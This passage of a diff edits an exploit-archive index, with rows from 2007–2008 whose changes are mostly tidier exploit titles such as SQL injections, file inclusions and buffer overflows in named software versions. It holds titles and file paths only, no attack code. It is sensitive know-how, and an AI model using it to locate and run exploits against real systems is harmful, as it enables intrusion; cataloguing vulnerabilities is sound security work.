SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 +4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0 @@ -3969,10 +3969,10 @@ id,file,description,date,author,platform,type,port 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - 'Search' Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 -4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 +4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32<4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,windows,dos,0 -4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 +4319,platforms/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 4320,platforms/php/webapps/4320.txt,"SomeryC 0.2.4 - (include.php skindir) Remote File Inclusion",2007-08-27,Katatafish,php,webapps,0 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 @@ -3987,7 +3987,7 @@ id,file,description,date,author,platform,type,port 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 - (viewitem.php ItemID) Blind SQL Injection",2007-08-28,irvian,php,webapps,0 4332,platforms/php/webapps/4332.txt,"VWar 1.5.0 R15 - (mvcw.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan 4.2.0 - (mvcw_conver.php) Remote File Inclusion",2007-08-28,DNX,php,webapps,0 -4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote,0 +4334,platforms/windows/remote/4334.txt,"Microsoft MSN Messenger 7.x (8.0?) - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 @@ -4083,7 +4083,7 @@ id,file,description,date,author,platform,type,port 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - SEARCH Command Authenticated Overflow",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0 -4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise Edition 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 +4431,platforms/windows/local/4431.py,"Microsoft Visual Basic Enterprise 6.0 SP6 - Code Execution",2007-09-19,shinnai,windows,local,0 4432,platforms/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",multiple,dos,0 4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0 @@ -4104,7 +4104,7 @@ id,file,description,date,author,platform,type,port 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 - (If-Modified-Since) Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion",2007-09-24,BiNgZa,php,webapps,0 -4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote,0 +4452,platforms/windows/remote/4452.html,"Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd - 'EBCRYPT.dll 2.0' Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log 0.5.3 - (skin_url) Remote File Inclusion",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 @@ -4119,7 +4119,7 @@ id,file,description,date,author,platform,type,port 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload",2007-09-28,InATeam,php,webapps,0 -4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 +4467,platforms/php/webapps/4467.pl,"MD-Pro 1.0.76 - SQL Injection",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Inclusion",2007-09-29,bd0rk,php,webapps,0 @@ -4198,7 +4198,7 @@ id,file,description,date,author,platform,type,port 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 - 'djpage.php' Remote File Inclusion",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey 1.52 - (language.php) Remote File Inclusion",2007-10-17,S.W.A.T.,php,webapps,0 4545,platforms/php/webapps/4545.txt,"awzMB 4.2 Beta 1 - Multiple Remote File Inclusion",2007-10-18,S.W.A.T.,php,webapps,0 -4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - (help.php) Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 +4546,platforms/php/webapps/4546.txt,"ZZ FlashChat 3.1 - 'help.php' Local File Inclusion",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Blind SQL Injection",2007-10-20,"Michael Brooks",php,webapps,0 4548,platforms/php/webapps/4548.php,"Vanilla 1.1.3 - Blind SQL Injection",2007-10-20,InATeam,php,webapps,0 4549,platforms/php/webapps/4549.txt,"PHP Project Management 0.8.10 - Multiple Remote File Inclusion / Local File Inclusion Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 @@ -4241,7 +4241,7 @@ id,file,description,date,author,platform,type,port 4586,platforms/php/webapps/4586.txt,"ProfileCMS 1.0 - Arbitrary File Upload",2007-10-29,r00t@zapak.com,php,webapps,0 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 - (table) SQL Injection",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 -4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0 +4589,platforms/php/webapps/4589.htm,"PHP-AGTC Membership System 1.1a - Remote Add Admin",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 @@ -4254,7 +4254,7 @@ id,file,description,date,author,platform,type,port 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 4602,platforms/php/webapps/4602.txt,"GuppY 4.6.3 - (includes.inc selskin) Remote File Inclusion",2007-11-03,irk4z,php,webapps,0 -4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 +4603,platforms/php/webapps/4603.txt,"Quick and Dirty Blog (qdblog) 0.4 - (categories.php) Local File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4604,platforms/php/webapps/4604.txt,"scWiki 1.0 Beta 2 - (common.php pathdot) Remote File Inclusion",2007-11-03,GoLd_M,php,webapps,0 4605,platforms/php/webapps/4605.txt,"Vortex Portal 1.0.42 - Remote File Inclusion",2007-11-04,ShAy6oOoN,php,webapps,0 4606,platforms/php/webapps/4606.txt,"nuBoard 0.5 - (index.php site) Remote File Inclusion",2007-11-04,GoLd_M,php,webapps,0 @@ -4366,10 +4366,10 @@ id,file,description,date,author,platform,type,port 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 4713,platforms/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 -4715,platforms/windows/remote/4715.txt,"badblue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 +4715,platforms/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 -4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 +4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"WordPress 2.3.1 - Charset SQL Injection",2007-12-11,"Abel Cheung",php,webapps,0 @@ -4407,7 +4407,7 @@ id,file,description,date,author,platform,type,port 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,linux,local,0 -4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 +4757,platforms/windows/dos/4757.txt,"HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4759,platforms/osx/local/4759.c,"Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"Microsoft Windows 2000 - AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 @@ -4540,7 +4540,7 @@ id,file,description,date,author,platform,type,port 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0 4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0 -4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0-SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 +4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Buffer Overflow",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 @@ -4554,7 +4554,7 @@ id,file,description,date,author,platform,type,port 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module 'PdvrAtl.DLL 1.0.1.25' - Buffer Overflow",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder - 'nid' Parameter Blind SQL Injection",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 -4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 +4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - 'topic' Parameter SQL Injection",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote,0 @@ -4574,42 +4574,42 @@ id,file,description,date,author,platform,type,port 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps,0 4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' Parameter SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 -4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion",2008-01-16,JosS,php,webapps,0 +4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - 'agregar_info.php' Local File Inclusion",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps,0 -4928,platforms/php/webapps/4928.txt,"mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 +4928,platforms/php/webapps/4928.txt,"MyBulletinBoard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps,0 -4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 -4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 +4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - 'language' Parameter Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 +4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 4932,platforms/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - 'stat.php' Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Dos",2008-01-18,Hunger,bsd,dos,0 -4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 -4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 -4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 +4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - 'info.php' Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 +4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - 'cfile' Parameter Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 +4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 -4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion",2008-01-20,shinmai,php,webapps,0 +4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - 'language' Parameter Local File Inclusion",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal",2008-01-20,Sha0,php,webapps,0 -4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 -4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 -4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 +4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - 'explorerdir.php' Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 +4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - 'IDFM' Parameter SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 +4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - SQL Injection / File Disclosure",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0 -4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - (blog.php month) SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 +4951,platforms/php/webapps/4951.txt,"Mooseguy Blog System 1.0 - 'month' Parameter SQL Injection",2008-01-21,The_HuliGun,php,webapps,0 4952,platforms/php/webapps/4952.txt,"BoastMachine 3.1 - 'mail.php' id SQL Injection",2008-01-21,"Virangar Security",php,webapps,0 4953,platforms/php/webapps/4953.txt,"OZJournals 2.1.1 - 'id' File Disclosure",2008-01-21,shinmai,php,webapps,0 -4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - (download.php Filename) File Disclosure",2008-01-21,MhZ91,php,webapps,0 +4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' Parameter File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 -4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 -4958,platforms/php/webapps/4958.txt,"aflog 1.01 - comments.php Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 +4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 +4958,platforms/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0 -4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 -4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.14 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 +4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' Parameter SQL Injection",2008-01-22,S@BUN,php,webapps,0 +4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 @@ -4619,7 +4619,7 @@ id,file,description,date,author,platform,type,port 4968,platforms/php/webapps/4968.txt,"Foojan Wms 1.0 - (index.php story) SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 - SQL Injection",2008-01-23,"Khashayar Fereidani",php,webapps,0 4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums 9.07 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 -4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 +4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0 @@ -4628,7 +4628,7 @@ id,file,description,date,author,platform,type,port 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 4978,platforms/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,hardware,dos,0 4979,platforms/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Buffer Overflow",2008-01-24,Elazar,windows,remote,0 -4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - (optimizer.php files) Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 +4980,platforms/php/webapps/4980.txt,"Seagull 0.6.3 - 'optimizer.php' Remote File Disclosure",2008-01-24,fuzion,php,webapps,0 4981,platforms/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - FileUploader Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote,0 4982,platforms/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote,0 4984,platforms/php/webapps/4984.txt,"Tiger PHP News System 1.0b build 39 - SQL Injection",2008-01-25,0in,php,webapps,0 @@ -4699,7 +4699,7 @@ id,file,description,date,author,platform,type,port 5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX 'mediagrid.dll' AddBitmap() Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 -5055,platforms/php/webapps/5055.txt,"Joomla! Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 +5055,platforms/php/webapps/5055.txt,"Joomla! Component com_Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 5056,platforms/php/webapps/5056.txt,"ITechBids 5.0 - (bidhistory.php item_id) SQL Injection",2008-02-04,QTRinux,php,webapps,0 5057,platforms/php/webapps/5057.txt,"XOOPS 2.0.18 - Local File Inclusion / URL Redirecting",2008-02-04,DSecRG,php,webapps,0 5058,platforms/php/webapps/5058.txt,"Mambo Component Awesom 0.3.2 - (listid) SQL Injection",2008-02-04,S@BUN,php,webapps,0 @@ -4917,7 +4917,7 @@ id,file,description,date,author,platform,type,port 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 